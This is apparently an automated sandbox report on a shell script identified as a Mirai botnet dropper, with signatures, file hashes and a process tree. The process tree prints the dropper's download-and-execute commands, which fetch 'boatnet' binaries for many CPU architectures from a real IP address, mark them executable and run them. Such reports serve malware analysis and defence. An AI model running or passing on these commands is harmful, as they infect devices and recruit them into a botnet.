Analysis
-
max time kernel
149s -
max time network
149s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
-
submitted
12-01-2025 14:38
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
e25f891adc7a50ef0de34587b5d59e24
-
SHA1
90118fabbbb484f6d7e3d94d5128cac84ca384d5
-
SHA256
cb69d62b52dd6917dbde67db70d37db577ea3fa002bb6f9fd6d88354f84a5a57
-
SHA512
cdd371403ebe19b4fc4a57fe5f48cf967f3baa2b11c8ab6abc69734c631209d8a1c45f17053d2f07e8fd5efe0f17420d661261b820fb07b01f820761270d13e0
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 15 IoCs
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Writes file to system bin folder 2 IoCs
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Reads runtime system information 36 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.x862⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.x862⤵
-
-
/bin/chmodchmod +x boatnet.x86 ohshit.sh systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-6jHpIp WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-6jHpIp WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.arc2⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-6jHpIp WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.i4682⤵
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.i4682⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-6jHpIp WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.i6862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.i6862⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-6jHpIp WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.x86_642⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-6jHpIp WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.mpsl2⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-6jHpIp WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
-
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.arm2⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-6jHpIp WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.arm52⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.arm62⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.arm72⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.ppc2⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.spc2⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.m68k2⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://94.158.245.27/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://94.158.245.27/hiddenbin/boatnet.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat boatnet.sh42⤵
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
31KB
MD521165b8b4e986efc031cd41016dde6b6
SHA139ce8fe9071745d8f2f5493b243376dbd5418a36
SHA256a61b712082a6c62842aa60f98806b2daf292a54119ae5f4d422fee3239fc5c86
SHA51296a0d5ee860f38716f07780d9b47949851f6cc8284d17278d0a432b36a1dfd879966c160abb43ef294bfd6047504f84019ae51639f8ede3e00ab76502671c0ed
-
Filesize
121KB
MD5b2137fad57343a2c54f4167b42c52b4f
SHA13e2dfcd9b129e9502ef854f7451f7299812036ba
SHA256cdd7d9565af3469b9a821239429b637797480fdc5e7f42095b948da44fe47921
SHA512e9e5db39f798746dd16435db13548964d6e71f3002fb6123e7f0f3436c8f340a394701acf87b00bcce9c5176e89c0d46bf33ca51184d78ad7928a77cdff91d3c
-
Filesize
220B
MD5f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1750274b02d5f5b00026a4f55b020f4285c693533
SHA256219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA51236bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259
-
Filesize
31KB
MD5fbc0418c5814b38ea0700dd88bcaa9a3
SHA19890e3e3e8428a490404f3c037b3a4440cd98c0d
SHA2566180a72b71fd89c5aa94c451434ae2bce4ab8e47b746105345542ffb4ceec762
SHA5125f9c6048e39e9f7cc9c91e52097e0762e991d40952a467783e7ad17d4704a6f92de9d89334c30a3471b2c3e4f502a331c0ffb55435fa95afb12c5eb27b5eb63a
-
Filesize
81KB
MD526351d226a4e7b04aa180a044dba1d14
SHA182709b83511bab77d6aea2ad1283b5470570aff3
SHA25670d6b5db633fa0992d1a3d0e625b3d530f840dc5971273c2707285d34c7bc9b1
SHA512a47f6c44eae33b2ed3d7809cd3e0d31ba158ca686fe4c3f3162f80d5fb110b1dd268379df8e95ff193613694a0946dadb14add6f85f7e7214bc96d7442b2bd74
-
Filesize
29KB
MD5545dbe1d228295c958b5a3f6ec4d8278
SHA1f8dff366ea07681be596cdb33911c3f4119d0763
SHA256a8cbba23e7c866ccf3dc8b4d4e1cc5a51de83272cb6f8df8746a51a2817d8f7b
SHA512fe2115ad64b5755a4b4d71660d8de94c0a7f3f7d9eb3519a6e82216621f83d0855a32c41963b22dabac02e9d82c95cca8efce568d2fdafd8123e4f443c335a3f